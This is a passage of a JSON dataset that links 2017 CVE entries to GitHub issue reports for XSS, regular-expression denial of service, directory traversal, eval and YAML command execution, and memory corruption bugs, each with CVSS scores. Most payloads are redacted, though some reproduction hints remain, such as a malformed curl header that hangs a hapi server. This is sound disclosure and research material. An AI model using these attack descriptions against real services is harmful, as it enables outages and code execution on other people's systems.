        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16009",
        "Issue_Url_old": "https://github.com/ceolter/ag-grid/issues/1287",
        "Issue_Url_new": "https://github.com/ag-grid/ag-grid/issues/1287",
        "Repo_new": "ag-grid/ag-grid",
        "Issue_Created_At": "2016-11-28T21:29:18Z",
        "description": "XSS vulnerability: Angular expression injection . I know that ag grid already covers HTML injection since NUMBERTAG but lately we found out that an XSS attack is still possible with a little bit more work when an application uses angular. It is possible to escape expression sandboxing APITAG URLTAG ) and inject code that can break the application. Are there plans to address this issue eventually?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16013",
        "Issue_Url_old": "https://github.com/hapijs/hapi/issues/3466",
        "Issue_Url_new": "https://github.com/hapijs/hapi/issues/3466",
        "Repo_new": "hapijs/hapi",
        "Issue_Created_At": "2017-03-31T16:37:42Z",
        "description": "Non handling of accept encoding header when the value does not conform to the regex. Greetings, We have been successfully using FILETAG (version APITAG on Node APITAG and Debian Jessie ) in production for a while now. Recently however we encountered strange entries in our logs. Specifically we started seeing a bunch of the following entries: ERRORTAG After much digging we where able to reproduce the issue using the following curl command $ curl X POST ' URLTAG d FILETAG H APITAG Type: application/json\" H \"accept encoding: deflate, gzip;q NUMBERTAG q NUMBERTAG APITAG As is immediately obvious, the APITAG header sent by the client is not correct according to the specification (since the APITAG after the last APITAG doesn't match). That results in the accept library's encoding function returning a Boom object that contains the value APITAG in the message property. It then seems like Hapi is using the Boom object as the actual encoding with ultimately makes the framework fail the following assertion (in APITAG ) ERRORTAG The end result is that the client that initiated the (erroneous) request is left hanging, since the framework never responds. Personally I don't care one bit about the client not receiving a response, however the fact that no response is produced results in various error logs in Internet facing reverse proxies (in the form of timeouts). I could create a PR that fixes this issue, but am hesitant to do so since I don't know what the behavior should be in this case. Should the appropriate response be an HTTP NUMBERTAG response, or something else (like using one of the correctly specified encodings)? It seems to me however that the current (non ) handling of such erroneous requests is not the desired behavior. Regards, George",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16016",
        "Issue_Url_old": "https://github.com/punkave/sanitize-html/issues/100",
        "Issue_Url_new": "https://github.com/apostrophecms/sanitize-html/issues/100",
        "Repo_new": "apostrophecms/sanitize-html",
        "Issue_Created_At": "2016-03-26T10:59:21Z",
        "description": "XSS through APITAG If we allowed at least one APITAG the result is a potential XSS vulnerability. APITAG CODETAG Problem in ontext method URLTAG : ERRORTAG text was already html decoded, by APITAG htmlparser2 setting, so we can break text context and inject custom HTML code",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16018",
        "Issue_Url_old": "https://github.com/restify/node-restify/issues/1018",
        "Issue_Url_new": "https://github.com/restify/node-restify/issues/1018",
        "Repo_new": "restify/node-restify",
        "Issue_Created_At": "2016-02-25T11:04:50Z",
        "description": "Cross site scripting error. I tested my restify server with this: URLTAG The returned data contains \" APITAG alert NUMBERTAG APITAG \" which some browsers will execute. Simple solution is to change the ERRORTAG at the end of the APITAG to something like this: callback(new ERRORTAG does not exist', APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16019",
        "Issue_Url_old": "https://github.com/GitbookIO/gitbook/issues/1609",
        "Issue_Url_new": "https://github.com/gitbookio/gitbook/issues/1609",
        "Repo_new": "GitbookIO/gitbook",
        "Issue_Created_At": "2016-11-25T21:37:48Z",
        "description": "Cross Site Scripting vulnerability in online reader!. I accidentally discovered that the online reader of APITAG is vulnerable to Cross Site Scripting (XSS) URLTAG . If HTML or Javascript code is not put in backticks to mark it as a code block (e.g. APITAG ) it will actually be executed. This is a severe security issue and should be addressed immediately. I added a harmless Javascript alert script to a page in my book for you to verify the issue: FILETAG > Disclaimer: I have reported this issue some weeks before via email and Slack but neither received a response nor was the issue fixed silently.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16020",
        "Issue_Url_old": "https://github.com/notduncansmith/summit/issues/23",
        "Issue_Url_new": "https://github.com/notduncansmith/summit/issues/23",
        "Repo_new": "notduncansmith/summit",
        "Issue_Created_At": "2016-04-08T13:07:34Z",
        "description": "Unsafe use of eval. The following use of eval in PATHTAG is dangerous: ERRORTAG An attacker can use a malicious payload instead of a valid collection name to inject arbitrary commands. I suggest one of the following options: refactoring out eval, use adhoc regex validation or use a heavyweight sanitization package like URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16021",
        "Issue_Url_old": "https://github.com/garycourt/uri-js/issues/12",
        "Issue_Url_new": "https://github.com/garycourt/uri-js/issues/12",
        "Repo_new": "garycourt/uri-js",
        "Issue_Created_At": "2016-03-15T07:38:00Z",
        "description": "parse hangs on some long urls. During penetration tests with Burp Suite URLTAG we found that our app hangs on some requests. It turned out that uri js parse hangs on some long urls. Here is a simple script to reproduce it: CODETAG Here is the result on my machine ERRORTAG Notice how the time increases exponentially about NUMBERTAG for each new segment. So with long enough URL parse just hangs at NUMBERTAG CPU. It seems uri js uses a generated regex which in my case appears to be this: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16023",
        "Issue_Url_old": "https://github.com/sindresorhus/decamelize/issues/5",
        "Issue_Url_new": "https://github.com/sindresorhus/decamelize/issues/5",
        "Repo_new": "sindresorhus/decamelize",
        "Issue_Created_At": "2015-12-23T00:56:07Z",
        "description": "if the separator is |, this function does not work. You seem to have fallen prey to a \"regular expression injection attack\" :(.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16024",
        "Issue_Url_old": "https://github.com/gvarsanyi/sync-exec/issues/17",
        "Issue_Url_new": "https://github.com/gvarsanyi/sync-exec/issues/17",
        "Repo_new": "gvarsanyi/sync-exec",
        "Issue_Created_At": "2016-01-24T07:00:02Z",
        "description": "Insecure temporary directores. The module uses temporary directories but creates them in an insecure way. Besides general issues related to making of tmp files, the implementation in PATHTAG does not handle errors. The variable created is set to true even if the directory already exists and belong to another user. It seems that errors should be handled by callback, but it is inconsistent with synchronous usage of fs.mkdir. Some node modules were suggested in response to the stackoverflow question \"nodejs Temporary file name [closed]\" URLTAG More details related to the issue is given in APITAG temporary files securely\" URLTAG This kind of vulnerabilities is discussed in general in FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16025",
        "Issue_Url_old": "https://github.com/hapijs/nes/issues/171",
        "Issue_Url_new": "https://github.com/hapijs/nes/issues/171",
        "Repo_new": "hapijs/nes",
        "Issue_Created_At": "2017-01-27T11:31:54Z",
        "description": "server falls with bad cookie header. Node server falls. I think problem is in request without or bad cookie header. PATHTAG const auth = APITAG ^ ERRORTAG Cannot read property 'nes' of null at PATHTAG at APITAG [as parse] ( PATHTAG ) at APITAG ( PATHTAG ) at new APITAG ( PATHTAG ) at APITAG [as _add] ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG APITAG at APITAG APITAG at PATHTAG at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG APITAG at APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-16026",
        "Issue_Url_old": "https://github.com/request/request/issues/1904",
        "Issue_Url_new": "https://github.com/request/request/issues/1904",
        "Repo_new": "request/request",
        "Issue_Created_At": "2015-11-16T11:42:12Z",
        "description": "first argument must be a string of Buffer. Hi, I was running some code and got this error message: ERRORTAG Funny thing is, that if I replace the current version of request module with an older one NUMBERTAG PATHTAG ), according to changelog), everything works just fine. The code that causes this error is this: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-16029",
        "Issue_Url_old": "https://github.com/henrytseng/hostr/issues/8",
        "Issue_Url_new": "https://github.com/henrytseng/hostr/issues/8",
        "Repo_new": "henrytseng/hostr",
        "Issue_Created_At": "2016-12-11T12:22:18Z",
        "description": "A directory traversal issue. This package is vulnerable to directory traversal. An attacker can provide input such as APITAG to read files outside of the specified working directory.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16038",
        "Issue_Url_old": "https://github.com/shy2850/node-server/issues/10",
        "Issue_Url_new": "https://github.com/shy2850/node-server/issues/10",
        "Repo_new": "shy2850/node-server",
        "Issue_Created_At": "2017-04-18T00:29:41Z",
        "description": "Directory Traversal. First of all, this is an awesome package with lots of functionalities. It just has a directory traversal issue, which can be fixed by adding some filtering on the requested url path. To exploit the vulnerability, I can just send a web request say: APITAG to browse and retrieve any file on the hosting server. Notice: the above url does not work with wget or a browser. Try it by using APITAG in a FILETAG program.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16042",
        "Issue_Url_old": "https://github.com/tj/node-growl/issues/60",
        "Issue_Url_new": "https://github.com/tj/node-growl/issues/60",
        "Repo_new": "tj/node-growl",
        "Issue_Created_At": "2016-07-21T12:47:55Z",
        "description": "Unsafe use of exec. The module does not sanitize the input before passing it to exec. Therefore the following code snippets may produce unexpected results for some of the users of the library: APITAG Use a sanitization npm module like shell quote or replace exec with spawn!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16088",
        "Issue_Url_old": "https://github.com/patriksimek/vm2/issues/59",
        "Issue_Url_new": "https://github.com/patriksimek/vm2/issues/59",
        "Repo_new": "patriksimek/vm2",
        "Issue_Created_At": "2017-03-02T14:53:47Z",
        "description": "Advantages over the native VM module. Hello there :) Just wanted to know if there are clear advantages using vm2 over node's native VM module tried to look for it in the readme but couldnt find anything. I'm using vm on node NUMBERTAG and was wondering if I should potentially look at vm2 if it fixes / handles specific use cases. Cheers!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16088",
        "Issue_Url_old": "https://github.com/hacksparrow/safe-eval/issues/5",
        "Issue_Url_new": "https://github.com/hacksparrow/safe-eval/issues/5",
        "Repo_new": "hacksparrow/safe-eval",
        "Issue_Created_At": "2017-03-04T00:31:14Z",
        "description": "Securrity issue: node's VM module doesn't prevent you from accessing the node stdlib. As simple as: APITAG This should be mentioned in the readme, as the VM isn't so safe and people might instead think this prevents any kind of attack :) Ref: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16098",
        "Issue_Url_old": "https://github.com/node-modules/charset/issues/10",
        "Issue_Url_new": "https://github.com/node-modules/charset/issues/10",
        "Repo_new": "node-modules/charset",
        "Issue_Created_At": "2017-09-05T17:52:25Z",
        "description": "Vulnerable Regular Expression. The following regular expression used for parsing the HTTP header is vulnerable to APITAG APITAG The slowdown is moderate: for NUMBERTAG characters around NUMBERTAG seconds matching time. I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16099",
        "Issue_Url_old": "https://github.com/blakeembrey/no-case/issues/17",
        "Issue_Url_new": "https://github.com/blakeembrey/no-case/issues/17",
        "Repo_new": "blakeembrey/no-case",
        "Issue_Created_At": "2017-09-08T08:57:26Z",
        "description": "Vulnerable Regular Expression. The regular expression in FILETAG , used to transform the input string is vulnerable to APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16100",
        "Issue_Url_old": "https://github.com/skoranga/node-dns-sync/issues/5",
        "Issue_Url_new": "https://github.com/skoranga/node-dns-sync/issues/5",
        "Repo_new": "skoranga/node-dns-sync",
        "Issue_Created_At": "2017-09-05T12:56:04Z",
        "description": "Vulnerable Regular Expression. The following regular expression introduced for validating the hostname is vulnerable to APITAG APITAG The slowdown is very serious: for NUMBERTAG characters around NUMBERTAG seconds matching time. I would suggest one of the following: remove the regex, limit the number of characters that can be matched by the repetition, limit the input size. Moreover, the regular expression allows validation bypassing and hence arbitrary command execution!!! If needed, I can provide an actual example showing the slowdown or the validation bypass.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16113",
        "Issue_Url_old": "https://github.com/get/parsejson/issues/4",
        "Issue_Url_new": "https://github.com/galkn/parsejson/issues/4",
        "Repo_new": "galkn/parsejson",
        "Issue_Created_At": "2017-09-08T09:08:19Z",
        "description": "Vulnerable Regular Expression. The following regular expression used in parsing the JSON file is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16114",
        "Issue_Url_old": "https://github.com/chjj/marked/issues/937",
        "Issue_Url_new": "https://github.com/markedjs/marked/issues/937",
        "Repo_new": "markedjs/marked",
        "Issue_Created_At": "2017-09-07T13:35:28Z",
        "description": "Vulnerable Regular Expression. The following regular expression used in parsing the input markdown content is vulnerable to APITAG APITAG The slowdown is very serious (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16115",
        "Issue_Url_old": "https://github.com/indexzero/TimeSpan.js/issues/10",
        "Issue_Url_new": "https://github.com/indexzero/timespan.js/issues/10",
        "Repo_new": "indexzero/timespan.js",
        "Issue_Created_At": "2017-09-07T09:43:18Z",
        "description": "Vulnerable Regular Expressions. The following regular expressions used for parsing the dates are vulnerable to APITAG APITAG The slowdown is relatively large when combining the slowdown produced by all the regexs (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16116",
        "Issue_Url_old": "https://github.com/jprichardson/string.js/issues/212",
        "Issue_Url_new": "https://github.com/jprichardson/string.js/issues/212",
        "Repo_new": "jprichardson/string.js",
        "Issue_Created_At": "2017-09-06T14:45:41Z",
        "description": "Vulnerable Regular Expressions. The following regular expressions used in underscore and APITAG methods are vulnerable to APITAG APITAG The slowdown is moderately low (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16117",
        "Issue_Url_old": "https://github.com/dodo/node-slug/issues/82",
        "Issue_Url_new": "https://github.com/dodo/node-slug/issues/82",
        "Repo_new": "dodo/node-slug",
        "Issue_Created_At": "2017-09-06T14:08:19Z",
        "description": "Vulnerable Regular Expression. The following regular expression used in parsing the input string is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16129",
        "Issue_Url_old": "https://github.com/visionmedia/superagent/issues/1259",
        "Issue_Url_new": "https://github.com/ladjs/superagent/issues/1259",
        "Repo_new": "ladjs/superagent",
        "Issue_Created_At": "2017-08-07T17:15:56Z",
        "description": "Limit maximum response size. Superagent buffers and uncompresses responses in memory. Malicious server could send extremely large response causing superagent to use excessive amounts of memory. I suggest adding a way to set a maximum response size, and have a default limit set.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-16137",
        "Issue_Url_old": "https://github.com/visionmedia/debug/issues/501",
        "Issue_Url_new": "https://github.com/debug-js/debug/issues/501",
        "Repo_new": "debug-js/debug",
        "Issue_Created_At": "2017-09-05T11:59:41Z",
        "description": "Vulnerable Regular Expression. The following regular expression used in the \"o\" formatter is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16138",
        "Issue_Url_old": "https://github.com/broofa/node-mime/issues/167",
        "Issue_Url_new": "https://github.com/broofa/mime/issues/167",
        "Repo_new": "broofa/mime",
        "Issue_Created_At": "2017-09-05T12:20:24Z",
        "description": "Vulnerable Regular Expression. The following regular expression used in the mime lookup is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16229",
        "Issue_Url_old": "https://github.com/ohler55/ox/issues/195",
        "Issue_Url_new": "https://github.com/ohler55/ox/issues/195",
        "Repo_new": "ohler55/ox",
        "Issue_Created_At": "2017-10-29T22:44:33Z",
        "description": "Stack buffer overlfow. Tested on ruby NUMBERTAG POC crash ( APITAG ): CODETAG Input file that causes the crash: URLTAG Launch: APITAG Output: ERRORTAG Backtrace: ERRORTAG Output with APITAG (ASAN): ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16357",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/8742",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8742",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-10-26T03:52:15Z",
        "description": "Memory corruption on NUMBERTAG bit system. A memory corruption issue was found in radare2 on NUMBERTAG bit linux system when handling crafted ELF file. Build information: CODETAG Backtrace: ERRORTAG Enviroment: ERRORTAG A POC file has been attached to reproduce this issue. FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16358",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/8748",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8748",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-10-27T06:59:04Z",
        "description": "Address sanitizer reports heap buffer overflow on NUMBERTAG bit linux system. Address sanitizer reports heap buffer overflow on NUMBERTAG bit linux system when radare2 handles crafted data. My enviroment: ERRORTAG Radare2 build information: CODETAG ASAN reports on heap buffer overflow: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16359",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/8764",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8764",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-10-31T12:01:14Z",
        "description": "Crash in ELF version parse. This issue looks like NUMBERTAG but it should be a different one. ERRORTAG Build information and enviroment: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16516",
        "Issue_Url_old": "https://github.com/brianmario/yajl-ruby/issues/176",
        "Issue_Url_new": "https://github.com/brianmario/yajl-ruby/issues/176",
        "Repo_new": "brianmario/yajl-ruby",
        "Issue_Created_At": "2017-11-02T02:22:45Z",
        "description": "SIGABRT process aborted. APITAG APITAG File passed as input: APITAG Output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16546",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/851",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/851",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-04T06:27:48Z",
        "description": "Heap Allocation errors, uninitialized integers used to allocate memory as well as conditional jumps depending on uninitialized values, while feeding a malformed WPG File. Description There seems to be a number of heap Allocation errors, uninitialized integers used to allocate memory as well as conditional jumps depending on uninitialized values, while running a verbose identify on a malformed image file. All of these conditions can be triggered by using a single WPG file. Steps to Reproduce This occurs while running ./magick identify verbose %file% on a malformed WPG file. FILETAG The hexdump of the input file is: CODETAG The Memcheck output is huge, I'm sharing it as a txt file attached with the report. FILETAG However some of the relevant parts are: ERRORTAG ERRORTAG ERRORTAG System Configuration Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC Delegates (built in): OS: Ubuntu NUMBERTAG Compiler: clang version NUMBERTAG PATHTAG ) / gcc version NUMBERTAG APITAG NUMBERTAG ubuntu3) Target NUMBERTAG pc linux gnu",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16615",
        "Issue_Url_old": "https://github.com/thanethomson/MLAlchemy/issues/1",
        "Issue_Url_new": "https://github.com/thanethomson/mlalchemy/issues/1",
        "Repo_new": "thanethomson/mlalchemy",
        "Issue_Created_At": "2017-11-07T08:26:15Z",
        "description": "parse_yaml_query method is vulnerable. from mlalchemy import parse_yaml_query parse_yaml_query( PATHTAG APITAG Hi, there is a vulnerability in parse_yaml_query method in parser.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16616",
        "Issue_Url_old": "https://github.com/Stranger6667/pyanyapi/issues/41",
        "Issue_Url_new": "https://github.com/stranger6667/pyanyapi/issues/41",
        "Repo_new": "stranger6667/pyanyapi",
        "Issue_Created_At": "2017-11-07T08:31:08Z",
        "description": "APITAG method is vulnerable . from pyanyapi import APITAG APITAG 'container > APITAG PATHTAG APITAG Hi, there is a vulnerability in APITAG method in Interfaces.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16618",
        "Issue_Url_old": "https://github.com/tadashi-aikawa/owlmixin/issues/12",
        "Issue_Url_new": "https://github.com/tadashi-aikawa/owlmixin/issues/12",
        "Repo_new": "tadashi-aikawa/owlmixin",
        "Issue_Created_At": "2017-11-07T08:28:51Z",
        "description": "load_yaml and load_yamlf methods is vulnerable. from owlmixin import util APITAG PATHTAG APITAG APITAG NUMBERTAG PATHTAG APITAG Hi, there is a vulnerability in load_yaml and load_yamlf methods in util.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16641",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1057",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/1057",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-11-01T19:38:32Z",
